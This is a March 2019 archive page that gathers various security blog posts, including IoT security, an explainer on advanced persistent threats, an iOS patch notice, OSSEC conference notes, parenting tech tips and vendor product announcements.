Monthly Archives: March 2019

How to Secure the Internet of Things

The Internet of Things (IoT) stands to have a tremendous impact on business – and life – as we know it. Gartner estimates that by 2020 the IoT will grow to 26 billion units installed, and IoT product and service suppliers will generate incremental revenue exceeding $300 billion, mostly in services. In the meantime, the cost of adding IoT capability to consumer products will gradually decrease, and connectivity will become ubiquitous. New industries will develop and old ones will disappear altogether or evolve into something entirely new. Society will be transformed as more data becomes available to us as consumers, enabling us to make informed decisions about how we live our daily lives.

The IoT will also have a significant impact on however, as an industry, approach security. Security approached as an afterthought or layered preventive controls will not suffice in the IoT. In order to fully benefit from all the IoT has to offer, companies must consider its security implications and address them early on. This blog introduces the security risks inherent in the IoT and how this new technology stack must be secured.

Going a step further, this product system is being integrated with other product systems to create a system of systems of which the farming equipment is just one component. It might also include a weather data system, a seed optimization system and an irrigation system, all of which feed into a farm management system. Thus, the competition within the farming industry is shifting from discrete products to product systems, while the farmers themselves gain a competitive advantage through increasing yield.

But that’s just the beginning. We have barely begun to scrape the surface of what’s possible by connecting
smart devices.


The IoT Technology Stack

A new technology infrastructure is required to participate in the IoT. Companies must build, support and secure a new technology stack that begins with the endpoint – the ‘thing’ in the Internet of Things. This hardware may have embedded sensors and processors, as well as embedded software including an operating system, onboard software applications, a user interface and product controls.

The data collected by the endpoint’s sensors are transmitted over a communications network (often the Internet) to the cloud, where the data is managed in a big-data database system, and analyzed to optimize product operation and uncover new product insights. Additional applications that manage the monitoring, control, optimization and autonomous operation of product functions may also run in the cloud. External information sources, such as weather, traffic and prices, as well as business systems (ERP, CRM, etc.) may also be integrated at both the endpoint and cloud layers.


Security Risks Inherent to the IOT

As with any technology stack, there are a number of risks inherent to the IoT. Perhaps the most obvious relates to data privacy. The collection of vast amounts of customer and product data sparks concerns regarding its ownership, how the data is used, who has access to it, who is responsible for securing it, what constitutes sensitive data, what constitutes competitive intelligence and more. These questions need to be answered and data protected accordingly, as there is great opportunity for abuse – from insurance companies using personal health data to increase rates, to attackers stealing data to sell to the victim’s competitor. The IoT also forces companies to consider the new legal liabilities that arise from sharing data access with trading partners.

Algorithms are used to control endpoints in the IoT. Algorithms are rules that dictate the endpoint’s behavior based on environmental changes or changes in the product’s condition. For example, an algorithm might dictate that when the temperature reaches 70 degrees, the air conditioner turns on. Algorithms can be built into the endpoint itself or reside in the product cloud. Unfortunately, an error in an algorithm could have an effect ranging from a mere annoyance to catastrophic, depending on the application.

Embedded software on endpoint devices also poses a risk. Vulnerabilities can be exploited using malware and the devices used as bots to execute denial-of-service attacks. Attackers can potentially take over device functionality to, for example, intercept sensitive communications or even cause bodily harm in the case of health devices like pacemakers and insulin pumps, or automobiles.


Security Measures and Challenges

In order to help reduce these risks, security by design is required at every level of the IoT technology stack. The traditional development approach of quickly releasing a product then adding security after the fact in the form of patches, updates and preventive software, falls apart in the new world of the IoT. Users cannot be expected to download antivirus software for every smart connected device they own. Nor does it make sound business sense to deploy patches and other updates to disposable, lightweight devices. IoT devices must be built with security and privacy controls baked in. The FTC has developed guidelines for building security into the Internet of Things, which includes security measures for protecting data at rest and in motion, preventing unauthorized access, and securing access between the endpoint’s technology stack and other enterprise systems.

Security efforts don’t get any easier as you move up the technology stack. The network must be protected against unauthorized access, and the data traversing the network must be properly encrypted to prevent sniffing. The cloud infrastructure and the third-party software running on it must be secured to prevent attackers from gaining access to endpoints through software vulnerabilities or weak configurations. Finally, user authentication and system access must be properly managed across the entire technology stack. This becomes a significant challenge in light of multiple stakeholders sharing interest in the assets and increasingly interconnected systems.


Service Providers Play a Key Role

ISPs and carriers play a key role in the IoT. IoT devices connect to the cloud over the ISP’s network. ISPs must undergo big changes to accommodate for this, beginning with flattening their networks. Today, ISPs have limited visibility to the devices that sit behind Network Address Translation (NAT) home cable modems. ISPs are
removing the NAT and adopting IPV6 in order to address all these devices and offer services on top. One of the key services that ISP will offer is security. ISPs will want to differentiate by offering a safer, more secure way for the IoT world to operate.


Conclusion

It has taken the information technology industry more than a decade to recognize the need for a detect and respond approach to network security. Given the presence of advanced persistent threats and the value of data, we will not have the luxury of time with the IoT. A holistic approach to securing the IoT is necessary from the start, with an emphasis on detecting and respond.

 

Ready to Ensure Your IoT Devices are Secure?

Get started with a personalized demo of our advanced threat detection solution, Network Insight.

Request a demo >

 

Network Insight
Big text: 
Blog
Resource type: 
Blogs

What Are Advanced Persistent Threats (APTs)?

Advanced Persistent Threats (APTs) are a cybercrime category directed at business and political targets. APTs require a high degree of stealth over a prolonged duration of operation in order to be successful. The attack objectives typically extend beyond immediate financial gain, and compromised systems continue to be of service even after key systems have been breached and initial goals reached. APTs can best be summarized by their named requirements:

Advanced:

Criminal operators behind the threat utilize the full spectrum of computer intrusion technologies and techniques. While individual components of the attack may not be classed as particularly “advanced” (e.g. malware components generated from commonly available DIY construction kits, or the use of easily procured exploit materials), their operators can typically access and develop more advanced tools as required. They combine multiple attack methodologies and tools in order to reach and compromise their target.

Persistent:

Criminal operators give priority to a specific task, rather than opportunistically seeking immediate financial gain. This distinction implies that the attackers are guided by external entities. The attack is conducted through continuous monitoring and interaction in order to achieve the defined objectives. It does not mean a barrage of constant attacks and malware updates. In fact, a “low-and-slow” approach is usually more successful.

Threat:

Threat means that there is a level of coordinated human involvement in the attack, rather than a mindless and automated piece of code. 

How APTs Breach Enterprises

APTs breach enterprises through a wide variety of vectors, even in the presence of properly designed and maintained defense-in-depth strategies:

  • Internet-based malware infection
  • Physical malware infection
  • External exploitation


Well-funded APT adversaries do not necessarily need to breach perimeter security controls from an external perspective. They can, and often do, leverage “insider threat” and “trusted connection” vectors to access and compromise targeted systems.

Abuse and compromise of “trusted connections” is a key ingredient for many APTs. While the targeted organization may employ sophisticated technologies in order to prevent infection and compromise of their digital systems, criminal operators often tunnel into an organization using the hijacked credentials of employees or business partners, or remote offices. Almost any organization or remote site may fall victim to an APT and be utilized as a soft entry or information harvesting point.

Low and Slow Attacks

A key requirement for APTs (as opposed to an “every day” botnet) is to remain invisible for as long as possible. The criminal operators of APT technologies tend to focus on “low and slow” attacks – stealthily moving from one compromised host to the next, without generating regular or predictable network traffic – to hunt for their specific data
or system objectives.

Tremendous effort is invested to ensure that malicious actions cannot be observed by legitimate operators of the systems.

Malware is a key ingredient in successful APT operations. Modern “off-the-shelf” and commercial malware openly available on the internet includes all of the features and functionality necessary to infect digital systems, hide from host-based detection systems, navigate networks, capture and extricate key data, provide video surveillance, along with silent and covert channels for remote control. If needed, APT operators can and will use custom developed malware tools to achieve specific objectives and harvest information from non-standard systems.

Criminal Remote-Control

At the very heart of every APT lies remote control functionality. Criminal operators rely upon this capability in order to
navigate to specific hosts within target organizations, exploit and manipulate local systems, and gain continuous access to critical information.

If an APT cannot connect with its criminal operators, then it cannot transmit any intelligence it may have captured. In effect, it has been neutered. This characteristic makes APTs appear as a sub-category of botnets. While APT malware can remain stealthy at the host level, the network activity associated with remote control is more easily identified.

APTs are most effectively identified, contained and disrupted at the network level.

 

Are APTs lurking in your environment?

See how you can chase them out of hiding with a personalized demo of our advanced threat detection solution, Network Insight.

Request a demo >

Network Insight
Big text: 
Blog
Resource type: 
Blogs

Weekly Update 132

Weekly Update 132

From last week's update in Seattle to home to Sydney to back home and a late update (again). But regardless, I'm committed to continuing the cadence of doing these updates each week and 132 of them in, I'm yet to miss a week.

This week it's a combination of more of the same (travel, events and data breaches), as well as more thoughts on the future of HIBP and Cloudflare's role when it comes to nasty content online. That last one in particular is a really tricky discussion and it's one that tends to come back to the surface after events that cause us to reflect on the nature of online speech that whilst legal, we all (well, almost all) just don't want being online. I'm not sure exactly what the answer is that allows us to have both the freedoms and safety we want, but I do think that acknowledging the issues on both sides of that debate is important. All that and more this week, next week will be another update from home and with any luck, one that puts be back on the usual Friday schedule.

Weekly Update 132
Weekly Update 132
Weekly Update 132

References

  1. I've got a bunch of events coming in the US, Europe and Israel (that's a complete list of all the public 2019 events)
  2. I'm being inducted into the Infosecurity Hall of Fame in London (this is pretty cool, I'm really looking forward to the event in June!)
  3. Tens of millions of more records went into HIBP this week (the Twitter feed lists them all, including how many unique addresses were found)
  4. The Cloudflare issue around what they should censor is a really dicey one (that link goes back to issues with the Daily Stormer in 2017 and is worth re-reading in light of recent events)
  5. Varonis is this week's blog sponsor (check out their live cyber attack workshop)
  6. I've created a bunch of training for Varonis in the past you can access for free (ransomware, insider threats and GDPR, amongst other topics)

10 Ways to Help Your Family Break Bad Tech Habits

A new study from Pew Research confirms our collective hunch that 95% of teens now report they have a smartphone and that 45% of teens now say they are always online. No shock there. The finding that is far more worrisome? That despite this dramatic digital shift over the past decade, parents are divided on whether today’s teens face a set of issues completely different than the issues of their youth.

When asked to compare the experiences of today’s teens to their own experiences when they were a teen, 48% of parents surveyed said today’s teens have to deal with a completely different set of issues. Likewise, 51% said that despite some differences, the issues young people deal with today is not that different from when they were teenagers.

This number is alarming from both a parenting perspective and a digital safety perspective. It means that while we’ve made incredible progress in our digital awareness and how to raise kids in this unique culture, a lot of parents are still woefully behind in their thinking. (Seriously: Could our experience as teens — minus the internet and smartphones — be any more different than the experience of today’s digital natives?)

Distracted Parents, Distracted Kids

In trying to understand this reality gap, the survey offered up another morsel of insight: That parents themselves are as distracted as kids when it comes to reliance on devices. Yep! As worried as parents say they are about the amount of time their teen spends online, parents’ digital behavior isn’t exactly praiseworthy. The survey found that 59% of parents say they at least sometimes feel obligated to respond to cell phone messages immediately, while 39% admit they regularly lose focus at work because they’re checking their mobile device and 36% say they spend too much time on their cell phone.

Reality Check

If half of us genuinely believe that our kids are growing up with issues similar to ours as teens (only with strange devices in their hands), and if we are telling our kids to lead balanced digital lives but our digital habits are off the rails, then — if we’re honest — we’ve got some serious work to do as parents.

How do we begin to shift these numbers in favor of our family’s digital health? How do we move from technology leading our family to the other way around?

Like any significant change, we begin at home — with the truth — and move forward from there. We’ve got this!

10 Ways to Improve Your Family Tech Habits

  1. Own your stuff. Let’s get real. Change begins with acknowledging our personal responsibility in what isn’t working. If your own screen time is out of control and you are trying to set healthy digital habits for your family — that contradiction is going to undermine your success. Take a look at your screen time habits, admit to the bad habits, and establish fresh tech goals moving forward.
  2. No shame zone. We know about establishing device-free zones in the home such as the dinner table, movie time, and the bedroom at night. Consider a no shame zone — the understanding that no one is made to feel shame for his or her not-so-great tech habits. It’s hard to move forward toward new goals if we beat ourselves up for the past, compare ourselves to others, or are made to feel like the bad guy for falling short. Acknowledge bad habits, discuss them openly, and help one another do better in the future. Your chances of success double when you have a team supporting you.
  3. Stick to a device curfew. Try a device curfew — say 8 p.m. to 8 a.m. — when devices are turned off and put into a drawer (yes, you have to get this intentional). A curfew increases face-to-face family interaction and creates space for non-device activities. It specifically reduces the temptation to habitually check your phone, get lost scrolling on Instagram, and getting sucked back into work emails. More importantly, it models for your kids that you don’t have to check your phone constantly, which has countless emotional and physical benefits.
  4. Be realistic with changes. The goal is to reduce your tech and strike a balance that complements — rather than conflicts with — your family’s lifestyle and wellbeing. We know that technology is now an ever-present part of family life so cutting it out completely is neither beneficial nor realistic. Achieving a healthy tech balance is an on-going process. Some days you will fare than others. The goal is to make progress (not perfection) toward a healthier, more balanced relationship with your technology. Going haywire with rules and consequences won’t get you there faster. Discuss as a family what changes need to be made and brainstorm ways to get there. Set some realistic goals that everyone can achieve and maintain not just in the short-term but also as a lifestyle.
  5. Turn off notifications. This is a small, powerful act that can transform your digital life. Getting pop up notifications for apps, emails, texts, calendar events, social media actions — you name it — might be your normal for you but far from beneficial. So, turn them all off. I dare you.
  6. Filter content. Tech balance isn’t just about less tech; it’s also about monitoring the content that flows into your home from the other side of the screen. You can turn off your family’s devices for 23 hours a day and if the content you allow into your home for that remaining one hour isn’t age-appropriate or conflicts with your family’s values and tech goals, then that one hour has tremendous influence. Take the time to explore filtering options that allow you to set time limits on your child’s (and your) technology, block dangerous websites and apps, and helps you strike a healthy tech balance that reflects your family’s lifestyle and needs. Roll up your sleeves: Co-view movies, go through apps and video games and discuss the issues that arise around the media your kids consume.
  7. Be the parent. Kids crave consistency and leadership from parents. No matter what age your child may be, as a parent, you are the most influential person in your child’s life. You pay the bills. You can shut devices and routers off — regardless of the tantrum level. Your opinion matters on video games, media, apps, friend groups, and content. Don’t let your child’s emotional protests keep you from parenting well and establishing and enforcing good tech habits. If you think your child has a technology addiction issue trust that instinct and take action.
  8. Get a plan, work it. We all nod when we read this but who has done it? You can’t get where you are going without a map. Put a family tech plan in place (with group input) and stick to it. Ideas to consider: Phone free zones, device curfew, chores and responsibilities, physical activity vs. screen time, social media behavior, tech security rules, TV viewing time, video game time limits, content guidelines, and expectations. If you discover that your tech plan isn’t working, zero in and make adjustments.
  9. Rediscover real life — together. Maybe you’ve gotten in some bad habits over the years. Don’t beat yourself up. Just decide to change things up moving forward. It’s never too late to change your family vibe. Explore new things together — nature, art classes, concerts, camping — anything that helps you disconnect from technology and reconnect to each other and real life.
  10. Keep. On. Talking. Sure you’ve said it before, so what? Make the conversation about digital issues a priority in your home. Ask your kids what’s going on with their friend groups and online. Talk about tech issues in the news. Talk about the health and emotional issues connected to excessive tech use. According to your child’s age, talk about the stuff that’s tough to talk about talking about like cyberbullying, suicide, self-harm, body image, and sexting. A good rapport with your child is the most powerful tool you have as a parent today.

Remember, technology is a tool not a way of life. Healthy screen habits begin parents who are grounded in reality and who model healthy screen habits themselves. Times have changed, there are challenges to be sure but stay the course parent: You’ve got the tools and the tenacity you need to get in front of those challenges and equip our kids to live wise, balanced digital lives.

The post 10 Ways to Help Your Family Break Bad Tech Habits appeared first on McAfee Blogs.

AHUKUMIWA MIAKA MIWILI JELA KWA KOSA LA KUHARIBU TAARIFA ZA ALIYEKUA MUAJIRI WAKE



KWA UFUPI: Steffan Needham, Amabae alihudumu kama mshauri wa maswala ya tehama (IT Cosultant) katika kampuni ya Voova ya nchini Uingereza amehukumiwa kifungo cha miaka 2 Jela kwa kosa la kuharibu taarifa za muajiri wake wa wa zamani.
--------------------------------

Kwa mujibu wa Thames Valley Police ya Nchini Uingereza, Mtuhumiwa alifukuzwa kazi na mwaajiri wake na baadae kuharibu taarifa zote muhimu za kampuni hiyo kwa kile kilicho tafsiriwa kama kulipiza kisasi kutokana na kufukuzwa kwake.
Uharibifu wa taarifa umekadiriwa kuigharimu kampuni hiyo kiasi cha Dola laki sita na elsfu Hamsini (US$650,000) ikiwa ni pamoja na kupelekea wafanyakazi kadhaa kupoteza kazi zao.

Mtuhumiwa amehukumiwa chini ya sheria ya nchini Uingereza ya mitandao (Computer Misuse Act)




Aidha, Kampuni husika imeonekana na mapungufu ya kushindwa kuwa na mikakati madhubuti ya kulinda taarifa zake ikiwa ni pamoja na uwekaji wa njia zaidi ya moja (multi-factor authentication) ya uthibitishaji pale mhusika anapotaka kuingia kwenye mifumio yake na kuhakiki ufutwaji wa taarifa katika mfumo unahusisha mtu zaidi ya mmoja.



Ushauri umetolewa kwa makampuni kuchukua tahadhari za dhati katika kulinda taarifa zake ili kujikinga na watumishi wasio wema walio ndani (Malicious/disgruntled insiders) kuweza kuleta maafa hapo baadae.


Wakati huo huo, mahakama Nchini marekani imepatia kibali cha ruhusa kwa Microsoft kuziangusha tovuti takriban 99 zilizo husishwa na uhalifu rubunishi (Phishing Attack).

Tom Burt, kutokea Microsoft ameeleza oparesheni iliyo ziharibu na kuziangusha tovuti hizo 99 ilihusisha makampuni mengine makubwa kama vile Yahoo na mengineyo.

Android Security & Privacy Year in Review 2018: Keeping two billion users, and their data, safe and sound


We're excited to release today the 2018 Android Security and Privacy Year in Review. This year's report highlights the advancements we made in Android throughout the year, and how we've worked to keep the overall ecosystem secure.
Our goal is to be open and transparent in everything we do. We want to make sure we keep our users, partners, enterprise customers, and developers up to date on the latest security and privacy enhancements in as close to real-time as possible. To that end, in 2018 we prioritized regularly providing updates through our blogs and our new Transparency Reports, which give a quarterly ecosystem overview. In this year-in-review, you'll see fewer words and more links to relevant articles from the previous year. Check out our Android Security Center to get the latest on these advancements.
In this year's report, some of our top highlights include:
  • New features in Google Play Protect
  • Ecosystem and Potentially Harmful Application family highlights
  • Updates on our vulnerability rewards program
  • Platform security enhancements
We're also excited to have Dave Kleidermacher, Vice President of Android Security and Privacy, give you a rundown of the highlights from this report. Watch his video below to learn more.

Thoughts on OSSEC Con 2019

Last week I attended my first OSSEC conference. I first blogged about OSSEC in 2007, and wrote other posts about it in the following years.

OSSEC is a host-based intrusion detection and log analysis system with correlation and active response features. It is cross-platform, such that I can run it on my Windows and Linux systems. The moving force behind the conference was a company local to me called Atomicorp.

In brief, I really enjoyed this one-day event. (I had planned to attend the workshop on the second day but my schedule did not cooperate.) The talks were almost uniformly excellent and informative. I even had a chance to talk jiu-jitsu with OSSEC creator Daniel Cid, who despite hurting his leg managed to travel across the country to deliver the keynote.

I'd like to share a few highlights from my notes.

First, I had been worried that OSSEC was in some ways dead. I saw that the Security Onion project had replaced OSSEC with a fork called Wazuh, which I learned is apparently pronounced "wazoo." To my delight, I learned OSSEC is decidedly not dead, and that Wazuh has been suffering stability problems. OSSEC has a lot of interesting development ahead of it, which you can track on their Github repo.

For example, the development roadmap includes eliminating Logstash from the pipeline used by many OSSEC users. OSSEC would feed directly into Elasticsearch. One speaker noted that Logstash has a 1.7 GB memory footprint, which astounded me.

On a related note, the OSSEC team is planning to create a new Web console, with a design goal to have it run in an "AWS t2.micro" instance. The team noted that instance offers 2 GB memory, which doesn't match what AWS says. Perhaps they meant t2.micro and 1 GB memory, or t2.small with 2 GB memory. I think they mean t2.micro with 1 GB RAM, as that is the free tier. Either way, I'm excited to see this later in 2019.

Second, I thought the presentation by security personnel from USA Today offered an interesting insight. One design goal they had for monitoring their Google Cloud Platform (GCP) was to not install OSSEC on every container or on Kubernetes worker nodes. Several times during the conference, speakers noted that the transient nature of cloud infrastructure is directly antithetical to standard OSSEC usage, whereby OSSEC is installed on servers with long uptime and years of service. Instead, USA Today used OSSEC to monitor HTTP logs from the GCP load balancer, logs from Google Kubernetes Engine, and monitored processes by watching output from successive kubectl invocations.

Third, a speaker from Red Hat brought my attention to an aspect of containers that I had not considered. Docker and containers had made software testing and deployment a lot easier for everyone. However, those who provide containers have effectively become Linux distribution maintainers. In other words, who is responsible when a security or configuration vulnerability in a Linux component is discovered? Will the container maintainers be responsive?

Another speaker emphasized the difference between "security of the cloud," offered by cloud providers, and "security in the cloud," which is supposed to be the customer's responsibility. This makes sense from a technical point of view, but I expect that in the long term this differentiation will no longer be tenable from a business or legal point of view.

Customers are not going to have the skills or interest to secure their software in the cloud, as they outsource ever more technical talent to the cloud providers and their infrastructure. I expect cloud providers to continue to develop, acquire, and offer more security services, and accelerate their competition on a "complete security environment."

I look forward to more OSSEC development and future conferences.

3 Ways Small Organizations Can Take a Proactive Approach to Security

Small Business SecurityWhile most large enterprises have recognized the value in taking a proactive approach to security, many smaller organizations may not yet realize that they are also a target for cybercriminals.  As a result, these organizations’ primary security strategy consists of waiting until an incident occurs to react, with minimal to no preventative security measures in place.

This makes small organizations a prime target for cyber criminals, with 58% of cyberattacks targeted at small businesses, according to the Verizon DBIR.

The problem is that this reactive approach often results in severe remediation and forensics costs, as well as substantial brand and reputation damage.

This has a significant effect on any business that is breached, but unlike larger organizations, smaller businesses often have a harder time recovering from the damage caused.  Many of these small businesses don’t recover at all, with 60% of small organizations going out of business within six months of suffering a cyberattack. 

When you take into consideration the growing frequency of small businesses that are breached and the rising costs of these breaches, it makes sense that taking a proactive approach to security can actually save you money in the long run.

So, what exactly does a proactive cybersecurity strategy consist of?

1.  Identifying your greatest vulnerabilities with Security Assessments.

The first step in proactively protecting your organization is understanding what exactly needs protecting.  This can be accomplished in a security assessment to understand and identify your greatest weaknesses ­­— before an adversary does.

These assessments could take the form of a Network Security & Architecture Review or a Penetration Test.  They are designed to find weaknesses in your security policies, network design, and device configurations and rules.

As an extra benefit, these assessments help you prioritize where to focus your budget.  This is a great way to get your executives on board, whose support is critical when gaining budget for other proactive measures.

2.  Monitoring your network continuously with a Managed Security Service Provider.

One of the best ways to proactively detect incidents is to have eyes on your network 24/7/365.  This can be done through a managed security services provider (MSSP), which will continuously monitor your endpoints and alert you when there is suspicious activity on your network.  The MSSP staff will also provide you with detailed recommended remediations so you can strengthen your network and prevent future incidents.

Although the cost of an MSSP may be comparable to hiring an internal employee, the value you receive from an MSSP is far greater than one person can offer.  Unlike a single employee, an MSSP offers you varied areas of expertise, access to technology, and around-the-clock coverage. 

3.  Reducing incidents resulting from human error with Security Awareness Training.

With human error accounting for 27% of cybersecurity incidents (Ponemon Institute), providing your staff with security awareness training is one of the most critical and budget-friendly proactive measures you can take.

This training should include secure password training, phishing campaigns, and secure travel training.  Be sure to incorporate this training into the onboarding process and include regular refreshers to ensure your staff is up-to-date and you are fostering a culture of cyber awareness.

By taking the necessary steps to implement proactive security measures, you can save money on costly breaches ­­– and possibly even save your business.

Not sure where to start? Contact us for a complimentary security assessment.

The post 3 Ways Small Organizations Can Take a Proactive Approach to Security appeared first on GRA Quantum.

Block Web Attacks On Your Phone Using The New Cloudbric Console App

Cloudbric Console App is now out and available for Android and iOS.

When we ask our users what they most like about Cloudbric’s services, our intuitive interface dashboard and functionality of our console are usually top picks.

We make it easy for users to simply login and view their security status without complications, as Cloudbric protection runs in the background.

Now, with the release of our first ever mobile application, it’s become even easier to access Cloudbric’s services and for users to monitor their websites via their smartphones.  

Cloudbric’s new service console app was developed with the goal of providing users greater control and visibility while on the go, allowing users to receive updates via push notifications anytime and anywhere.

With its simple user interface, users can access their information and site settings as well track their traffic usage and check on the progress of their site registration just as they would on their PCs.

Users can instantly get notifications of attacks to their sites and receive push alarms when their website or websites reach the 80% and 100% traffic limit, enabling quick response.

Typically, administrators, developers, or IT personnel can only monitor web attacks or resolve certain issues, such as blacklisting and whitelisting IPs, via their dashboard on the web. Now, the console app will allow IT personnel to resolve these issues and do everything administratively via the dashboard on mobile.

So whether you’re managing one site or twenty sites, the new console app will make viewing your security status easy.

But it doesn’t end there – Cloudbric’s development team is currently building a drop menu for integrating deep learning security (available in Q2).

A step further in bringing blockchain and security together, Cloudbric will also roll out a crypto wallet that will serve as an add-on for users who own CLB or any other crypto to safely store, transfer, and manage it.

Cloudbric’s console service app is now available for download on Google Play and the App Store.

Google Play and the Google Play logo are trademarks of Google LLC.

Apple, the Apple logo, iPhone, and iPad are trademarks of Apple Inc., registered in the U.S. and other countries and regions. App Store is a service mark of Apple Inc.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Block Web Attacks On Your Phone Using The New Cloudbric Console App appeared first on Cloudbric.

iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at their keynote event, including new subscription offerings for news, television, video games, and a credit card service. But while these exciting announcements were being made, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and impacts devices ranging from the iPhone 5s and later, the iPad Air, and even products running tvOS. These software patches cover a variety of bugs that cybercriminals could use to obtain effects like denial-of-service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in Webkit, the browser engine Apple uses in many of its products including Safari, Mail, and App Store. Among these vulnerabilities were memory corruption bugs, which could lead to arbitrary code execution. This type of attack allows malicious actors to run any command on the target system, potentially taking over the victim’s files or allowing them to take over the victim’s system remotely. To prevent arbitrary code execution attacks, Apple improved device memory handling, state, and management. These processes control and coordinate device computer memory in order to optimize overall system performance. Another issue patched by this update is the ability for a cybercriminal to bypass sandbox restrictions, which protect a device’s critical infrastructure from suspicious code. To combat this, Apple issued an improvement to validation checks.

While it can be easy to click the “Remind Me Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iOS Users: Update Your Software to Avoid Security Vulnerabilities appeared first on McAfee Blogs.

DMitry Deepmagic information Gathering Tool Kali Linux

DMitry Deepmagic information Gathering Tool Kali Linux   DMitry (Deepmagic Information Gathering Tool) is a open source Linux CLI tool developed by James Greig. Coded in C. DMitry is a powerful information gathering tool that aims to gather as much information about a host that is possible. Features include subdomains search, email addresses, uptime information, […]

The post DMitry Deepmagic information Gathering Tool Kali Linux appeared first on HackingVision.

How to Enable Facebook White Hat Researcher Setting

How to Enable Facebook White Hat Researcher Setting   Facebook have implemented a white hat secuirty testing setting that allows its users to test security over various Facebook services.   Facebook will knowingly break its Certificate Pinning mechanism for its users that use white hat settings. Pinning is used to improve security of a website […]

The post How to Enable Facebook White Hat Researcher Setting appeared first on HackingVision.

From Mobile and ISP to Endpoint Engineering: Undergoing a Role Transition in the Security Industry

The technology around us is constantly changing, and cybersecurity practices are evolving to match these new innovations. As the cybersecurity landscape shifts to meet the needs presented by new technology, opportunities arise for cybersecurity professionals to step into new roles – an experience I recently underwent myself. I’ve recently shifted from McAfee’s Mobile and ISP Business Unit to our Enterprise Endpoint Engineering team, a transition that has given me the opportunity to leverage what I’ve learned in the industry and step forward as a leading woman in tech.

Through this process, I’ve seen first-hand how growth opportunities within the cybersecurity field are beneficial for both individuals and the future of the security industry as well. For example, my transition allows me to apply my past experience and knowledge to a new area of security. Previously, I specialized in engineering solutions that protected mobile, IoT, and smart home devices. However, with my transition into this new role, I am still protecting individual endpoint devices, but rather in a new type of environment — an organization’s network.

Just like the ever-growing number of IoT devices connecting to users’ home networks, endpoint devices are popping up everywhere in corporate networks these days. As we add more endpoint devices to corporate networks, there is a growing need to ensure their security.  Endpoint security, or endpoint protection, are systems that protect computers and other devices on a network or in the cloud from security threats. End-user devices such as smartphones, laptops, tablets, and desktop PCs are all classified as endpoints, and these devices are all now rapidly connecting to an organization’s network with every employee, partner, and client that enters the building. That’s why it’s imperative companies prioritize a robust and agile endpoint security strategy so that all of their network users can connect with confidence. Similar to securing all the personal devices on a home network, it’s a sizable challenge to secure all corporate endpoints. And my new team, the McAfee Enterprise Endpoint Engineering group, is here to help with exactly that.

Leading consumer engineering taught me how to make security simple for a home user’s consumption. How to protect what matters to a user without them being experts on the threat landscape or security vulnerabilities, security breaches and campaigns around device, data, cloud and network. This is something I plan to bring to the new role. Leading a business unit focused on delivering security through mobile carriers and ISPs taught me the strength of bringing together an ecosystem both on technology and the channel to solve end users’ security needs in a holistic way. That ecosystem view is another that I bring to this role, besides leading engineering from the lens of growing the business.

This transition is not only exciting from a personal perspective but also because it is a testament to the progress that is being seen across the cybersecurity industry as a whole. There’s a lot to be said about the vast opportunities that the cybersecurity field has to offer, especially for women looking to build a career in the field. Cybercriminals and threat actors often come from diverse backgrounds. The wider the variety of people we have defending our networks, the better our chances of mitigating cyberthreats. From there, we’ll put ourselves in the best position possible to create change – not only within the industry but within the threat landscape as a whole.

The post From Mobile and ISP to Endpoint Engineering: Undergoing a Role Transition in the Security Industry appeared first on McAfee Blogs.

Social Media: Where Cybercrime Lurks in the Shadows

When you think of cybercrime, the first thing that comes to mind is most likely cybercriminals operating on the dark web. Last year, however, cybercriminals made the jump over to social media and cashed in big – $3 billion worth, as a matter of fact. With approximately 2.77 billion people using one social media account or more, it’s no wonder these bad actors have followed the masses. While the average user distrusts the dark web, they do trust their chosen social media platforms. Whether it’s sharing birthdates or a current location, or accepting a follow or message request from strangers, users in front of a screen feel secure. Although, as the line between social platforms and the dark web quickly blurs, the events behind the screen are the real issue.

Since 2017, cryptomining malware has exploded on a global scale, with over half of the identified strains found on social media sites. Utilizing apps, advertisements, and malicious links, cybercriminals were able to deliver these attacks and earn $250 million per year. Not only are social media platforms being used to distribute cryptomining malware, but they are also used as a major source for spreading other types of malware – malvertisments, faulty plug-ins, and apps – that draw users in by offering “too good to be true” deals. Once clicked on, the malware attacks. From there, cybercriminals can obtain data, establish keyloggers, dispense ransomware, and lurk in the shadows of social media accounts in wait for the next opportunity.

That next opportunity could also be on a completely different social media platform. As these sites unknowingly make it easier for malware to spread from one site to another. Many social media accounts interconnect with one another across platforms, which enables “chain exploitation,” or where malware can jump from one account to the next.

In short, social media is a cash cow for cybercriminals, and they are showing no sign of slowing down. What it really comes down to is social platforms, like Instagram and Facebook, attract a significant number of users and are going to draw in a criminal component too. However, if you take the proper security precautions ahead of time, you can fight off bad actors and continuously scroll with confidence. Here are some tips to help you get started:

  • Limit the amount of personal information shared in the first place. Avoid posting home addresses, full birth dates, and employer information, as well as exact location details of where you are.
  • Be wary of messages and follow requests from strangers. Avoid clicking on links sent by someone you don’t know personally.
  • Report any spam posts or messages you encounter to the social media platform. Then they can stop the threat from spreading to other accounts.
  • Always use comprehensive security software. To help protect you from viruses, spyware, and other digital threats that may emerge from social media sites, consider McAfee Total Protection or McAfee Mobile Security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Social Media: Where Cybercrime Lurks in the Shadows appeared first on McAfee Blogs.

The Ultimate CyberParenting Hack – Managing Your Family’s Cybersafety with the help of your Wi-Fi Router!

